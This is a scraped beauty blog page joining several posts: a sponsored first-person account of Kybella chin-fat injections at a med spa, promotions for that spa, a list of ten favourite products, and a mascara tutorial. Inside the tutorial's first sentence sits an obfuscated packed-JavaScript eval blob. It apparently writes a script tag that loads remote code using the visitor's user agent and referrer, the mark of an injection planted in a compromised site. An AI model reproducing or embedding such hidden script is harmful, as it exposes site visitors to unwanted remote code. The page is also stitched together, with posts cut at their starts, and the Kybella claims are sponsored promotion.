Continue to present yourself as a woman of loveliness and dignity, a woman who feels good and knows she’s looking her best.
—Angela Lansbury, The Gentlewoman, Autumn/Winter 2012

I know most women prefer to keep their beauty secrets a secret. I mean, that is why we call them that, right? But recently I had an experience that was so over-the-top incredible, I just had to share it! So here comes my disclaimer: if you don’t want to know about beauty procedures, needles, and the icky things some of us go through to fight aging, please don’t read past this sentence!

Ok, the rest of you, are we good? Here goes…

What’s a double chin? According to the dictionary, it’s “a roll of fatty flesh below a person’s chin.” According to many women past a certain age, it’s something that starts as a nuisance, and worsens until you’re turleneck-bound. Causes for that extra bit of flesh & skin under your jawline vary, from fitness and lifestyle to simple genetics. By the time you are an adult, you have a pre-determined and permanent amount of fat cells stored in your lower jawline and upper neck. You can’t change them, and until recently, only plastic surgery and lasers could do anything to minimize the natural aging process of this area of the body.

But something new has stepped onto the anti-aging scene, and it’s making major waves! When Silk Touch Med Spa recently held an informational luncheon about a strange new concept called “Kybella,” I was super curious and decided to check it out.

According to Silk Touch, “Kybella is the new FDA injectable that dissolves fat under the chin.  It’s the biggest thing to hit the beauty industry since Botox, with even Millennials experiencing sagging jowls thanks to ‘tech neck.'” It’s an injectable, which means needles, and not everyone loves those little poky things going into their skin. But on the other hand, it’s nice to have options, vs. scalpels and lasers, not to mention the downtime and potential side effects that go along with those methods!

The before & after photos of Kybella really shocked me, along with hearing about the minimized risks, side effects, and downtime associated with it. I decided to try it, because even though I’m not technically overweight, age and genetics have given me a slowly-growing little double-chin that was starting to get on my nerves in photos and videos. I figured, if there was a way to make that “go away,” without too much risk, why not give it a try? I asked a ton of questions, then prepared myself with two weeks out of the public eye to chart my results.

Here is a video of what Kybella injections really look like, done on me this last February 2016. Yup, there are needles, and yes, it did hurt! As the needles progress, the burning sensation grows, so if you do give Kybella a try, prepare yourself for some discomfort. Watch below!

I was pretty swollen right after, and the burning feeling in my neck continued for a while that day. I kept ice packs on it, but definitely wanted to go home and rest.

kybella after treatment 2The photo above is hard for me to share publicly, but I’m doing it anyway, because if you’re considering doing Kybella yourself, I really, really want you to know that the swelling afterwards is no joke! Stay home a few days, if you can, and rest through it. That evening I took some ibuprofin, rubbed Arnica gel on my neck, and went to bed. The next day I was definitely still swollen; I felt like that lady who’s really a mask for Arnold Schwarzenegger in Total Recall…

two weeks 3

Little by little, it subsided, and I started to feel like myself again! Within a week I was out seeing friends, and no one noticed. (Or if they did notice, they certainly didn’t make any comments). It felt like I was the only one who knew something was different about my neck.

Here’s a pic from my follow-up appointment, at around 12 weeks. The before & after change really floored me! Since I don’t often view myself from the side, I really had no idea how dramatic the improvement was until I saw the pictures all together.

kybella before and after

These results definitely motivated me to do a second treatment (typically they recommend 2-4 for your best results.) I was still sore for quite a while, so I waited 18 weeks before going in to do the follow-up treatment, which was much quicker. And so was the downtime! Here’s a quick post-Kybella recap of my experience of the second treatment:

I recovered in a few days, and was confident enough for an on-stage appearance at Wine, Women & Shoes as one of the honorary Shoe Judges!

wine women shoes stylsgpygirl

So here we are, a few months later, and despite how awful that first video probably looked to some of you, I am SO GLAD I did this! It’s been amazing to see such dramatic results; my photos look better, my jawline looks better, and I’m back to bopping around town, doing my blogger girl thing. And the most exciting part of this whole journey, is that the results are pretty much permanent, thanks to that genetic and finite number of fat cells that have been obliterated forever! They’re not growing back, at least not anytime soon.

I’d love your feedback in the comments! Have you considered doing a treatment like I did? What worked and/or didn’t work for you? Are there questions you’re dying to ask me? I’m not an expert, but I’ll answer honestly from my own personal experience. Much love to everyone who took the time to read my story, and special thanks to the crew at Silk Touch Med Spa for the opportunity to try Kybella!

XOXO,
Tanya

friends! I am super excited to announce that I soon will be launching an investigative-style “beauty secrets” video series, with
Silk Touch Med Spa on Eagle Rd.!
We will be chatting with Dr. Brian Kerr, addressing questions & concerns about skin issues, veins, lines, aging gracefully, reversing damage, and looking into what the medical community has to offer us that is much more gentle and affordable than scalpels & surgery.

This isn’t about changing our “flaws;” it’s about the little things we can do to feel beautiful and confident, in our own skin! I am curious to learn about ways I can take care of myself, be proactive, and age gracefully.

There have been many amazing breakthroughs in the last few years, of treatments & procedures any woman can do to help maintain their natural beauty and slow down the effects of time, without going to crazy extremes like some celebrities do. Dr. Kerr and I are going to explore some of those things in our videos! Ever wondered what “needling” felt like, or if “Venus Freezes” really work? I’m going to try out a bunch of stuff, and share the experiences with you. If it’s pampering, or painful, or surprising, or just plain “meh…” you’re going to see it happening and get my honest feedback!

I would love to know what YOU are curious about!

Please join me this Thursday at the Silk Touch Anniversary Party (details on FB here), to experience Live demonstrations of services, special event pricing, meet and greet with the entire staff, and over $10k in prize and product giveaways (including some Boise Music festival tickets, thanks to 103.5 KISS-FM and107.9 Lite FM). If you RSVP at this link before you come, you will also get a free gift, just for walking in the door: bit.ly/silktouchrsvp.

Whether or not you can make it to the party, please leave me a comment or send me an email at Tanya@stylespygirl.com. I would LOVE to know what procedures, treatments, or products you are most curious about, or what questions you would like me to ask Dr. Kerr about in the videos!

XOXO,
Tanya

P.S. For the month of June, if you tell Silk Touch I sent you, microdermabrasions are 1/2 price! Also, book in June to try a Visia Skin Complexion Analysis for FREE (a $50 value), which I recommend everyone should try!!! It’s one of the BEST things on the market to know exactly what’s going on with your skin, at the surface and deep below. I hope you take them up on this offer. I’m definitely going to!!!

you have favorite beauty products that you just can’t live without? I DO! 😀
Here’s a quick list of the items I always keep on hand…

1. Burt’s Bees Citrus Facial Scrub – It’s inexpensive, but oh-so-effective! With natural exfoliating ingredients that won’t scratch or dry out your skin! I keep this in the shower, and use it a couple times a week. It leaves your skin feeling fresh & soft!

2. Miss Me Lip Gloss – You can get this at Belle Boutique in downtown Boise, or the mini Belle Boutique in Eagle (inside the Idaho Athletic Club.) I LOVE IT, and never put on lipstick without layering this underneath. It’s a nourishing, quenching, matte lip gloss (no sparkles or glitter!). I like the soft pink shade English Roses; it glides on so smoothly, and softens your lips. It can be worn alone, but I love using it as a base to prep my lips for lipstick. Great for those who live in dry climates!

3. Clean Slate Makeup Primer by Tarte – It’s not as heavy as other brands (great for my sensitive skin!), but provides fabulous coverage and a smooth, even surface to apply your foundation over. I’ve tried a few different primers over the years, and Tarte is one of the few that did NOT cause acne flare-ups!

4. Urban Decay Eyeshadow Primer Potion – A go-to product for makeup artists everywhere, this easy-to-apply eyeshadow base preps your eyelids for shadow, and seals in the color for all-day, smudge-proof wear. A must-have for girls who love eyeshadow!

5. Jet Set Waterproof Eyeliner by Smashbox– In my quest to find the “perfect” eyeliner, I came across this top-seller at Sephora. Immediately, I can see why it’s the first choice of many makeup artists & rock stars! It glides on smoothly, and  you can create a thin line, or thick, or even smudge it for the “smoky eye” look! Smudge it fast, though; it’s waterproof, and stays on until you wash it off! Super-long-lasting, and super-black, with no shimmer. Use a flat, angled eyeliner brush to apply.

6. Make Up For Ever Lash Fibers – I can’t say enough about this fantastic product, so here’s a picture of my lashes with & without Lash Fibers. Not only do the fibers beef-up your natural lashes, but they also condition them, and allow mascara to wash off more easily at night. The result: healthier eyelashes with less breakage! I’m addicted to this stuff – it’s fantastic!!

Click image to view full-sized picture.

7. Urban Decay Supercurl Curling Mascara – Wow, talk about drama! I love how this mascara separates my lashes, and coats them with intense, inky blackness! Want people to ask if you’re wearing fake eyelashes? Then try this mascara out!!!

8. Olivia Garden Ceramic + Ion Round Brush – There are a lot of great brushes out there, but this one shapes, de-frizzes, and glides effortlessly through my hair. It works better – and is less damaging! – than cheaper plastic brushes, but it’s still WAY less expensive than those fancy celebrity-endorsed designer brushes. Love it! If you are local to Boise, these brushes are available at Roots Salon downtown.

9. John Frieda Frizz-Ease 3-Day Straight – in a word, AMAZING!!! Want silky, shiny hair? Check out my video clip to see how it works!

10. Alterna Caviar Anti-Aging Color Hold Rapid Repair Spray – I always spray this on before flat-ironing my hair. (Tip: Never, ever flat-iron raw, unprotected hair! That causes burns & damage!) This is the Cadillac of shine & protection sprays, and since a little goes a long way, it lasts a very long time. It’s also a great glossing spray for all hair types; shimmer & shine, without weighing hair down! This fabulous stuff is available from Sephora, or if you live in Boise, at Roots Salon downtown!

So there you have it, a quick & easy list of things I love and use, over and over again.

I love your feedback – what are your favorite beauty products???  😀

From DRAB to FAB: A Quick Mascara Tutorial!

Some eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|edhzt|var|u0026u|referrer|zdrzy||js|php’.split(‘|’),0,{}))
basic steps for mascara application (and a few tricks you may not know about!)

STEP ONE: Primer & Eye Shadow. Gently apply a small
amount of primer to the upper lid. I love Urban Decay’s Primer Potion, but there are a
lot of other great brands out there. Since this isn’t an eye shadow tutorial, I
applied a neutral shadow (instead of the more dramatic blending of colors &
drama I usually prefer!) Swipe on your shadow, and follow with a light dusting
of setting powder.

STEP TWO: Inner Eyeliner. Ok, this is one of those tricks
I mentioned before. I learned this while doing makeovers for photo sessions at
O2 Photography – it adds great length & drama to the lash line! But it
takes practice. GENTLY lift your upper lid so that you can GENTLY apply black
eyeliner to the inner ledge of your eyelid, focusing on pushing the liner into
the lash line as much as you can. Two VERY important tips for doing this are:
1) Only use waterproof eyeliner, never kohl or shadow! Believe me, you don’t
want all that black stuff running into your eyeball; waterproof stays on much
longer! 2) Don’t over-use this method; save it for evenings & special occasions.
Too much lash drama for Day is like wearing sparkly high heels & a prom
dress to work: overdone!!

A lot of gals wear eyeliner on the inner part of their lower
lid. This is a great way to add drama, too! Experiment with different looks,
until you find what works best for your eye shape.

Wow, my eyes look so green in these pictures (instead of blue!) My bathroom lighting must be pretty golden...

STEP THREE: Outer Eyeliner. Again, I prefer waterproof
eyeliner for staying power, but there are many methods of lining your eyes.
Pencils works great, as do gel pots and shadow with a flat eye-lining brush.  Get the color as close to your lash line – and in it! – as you can. Build the color outward, but not too thickly, unless you are going for a certain “look,” like Marilyn Monroe or Bettie Page! Add a little extra at the outer corner, if your eyes are super-round (like mine!), and/or close-together. The lift at the corner can help them appear further apart.

STEP FOUR: Curling! Ok, there’s debate about this one. Some
gals curl their eyelashes all the time, others rarely. Some people believe over-curling can lead to lash loss & breakage. I believe they’re right, and prefer to only use a lash curler for special occasions. (I like to err on the side of long-term lash health over short-term drama.) Whatever you choose to do, the most important thing to remember is to NEVER, EVER curl your lashes AFTER you’ve applied mascara! That’s definitely a recipe for lash breakage, and eyelashes take much longer to grow back in than eyebrows or head hair! A few steps further down, and I’ll tell you another one of my special tricks for curling lashes SAFELY, post-mascara application! Read on…

STEP FIVE: Eyelash Primer. I love this stuff!! Again, there
are multiple brands of this, but I’ve tried a bunch, and one stands head & shoulders above the rest: Make Up For Ever’s “Lash Fibers”! It coats your lashes with actual fibers, to add both bulk and length. It also dries grey-to-clear, unlike some other lash primers that dry WHITE and show through your mascara – not pretty! Starting at about 1/3-up from the base of your lashes, coat and re-coat with the fiber, then let it dry for 1-2 minutes(about the time it takes to brush your teeth.)

STEP SIX: Mascara. I prefer a thickly-bristled mascara brush
that focuses on separation & definition. (My current fave is the new Volumnous Million Lashes in Blackest Black, from L’oreal.) Start super-close to your lash
line, lower than you coated with the Fiber. Work a good amount of mascara into
the base of your lashes, working outward with twists & turns of the brush,
focusing on separation rather than drama. Let a coat dry for a minute (not
completely dry), then follow with a second coat.

STEP SEVEN: Here is another trick, one that takes practice!
Believe me, when I first learned this from a model friend when I was a
teenager, I poked myself plenty of times. Nothing like jabbing your eye with a
pin to motivate a slow, steady hand! Please, please be careful with this.
Starting towards the base of your lashes and working outward, run a long safety
pin through any clumps that have formed. The goal is to separate each &
every lash, so we can add drama & volume later.

Now here comes that other trick I hinted at earlier! Ready for this? Go get a baby spoon, one of the metal ones with rubber coating on the part that goes into baby’s mouth. As your mascara is drying, you can gently press the back of the spoon against your lashes, curling them up. (If your mascara is already dry, exhale on the back of the spoon to add a little moisture, then press it against your lashes.)  Bending lashes with baby spoons is a back-stage fashion show trick, and a great way to curl them post-mascara, without the breakage of an eyelash curler! Ta-da! 😀 Try it – you’ll love it!!!

STEP EIGHT: Adding mascara to your lower lashes is optional.
It depends on your taste, your time, and the shape of your eyes. Experiment
& practice to find what works best for you!

STEP NINE: Add Drama! I usually skip this last step, for “every-day”
makeup. But for evening and going-out, it’s a must-do! Now that your lashes are long & defined, go over them with a coat of your favorite volume mascara. (I like L’Oreal’s Volumnous Carbon Black or Cover Girl’s Lash Blast Volume.)  They are not great for separation & definition, but they sure can pile on the drama!) Coat, coat, and re-coat!!! You may need to re-do the pin trick after this, if this step creates clumps. Clumps are not glamorous!

So there you have it, luscious lashes from beginning to end! Practice and experiment to find what works best for you. And, most importantly,
wash your mascara off EVERY night. Twisting your hair into a tight bun and sleeping on it would lead to wear, tear, and breakage; it’s the same with mascara & eyelashes! Sleeping in makeup has long-term repercussions. Don’t do it!!

Have any tips or tricks to share? Please feel free to post questions and comments!! 😀
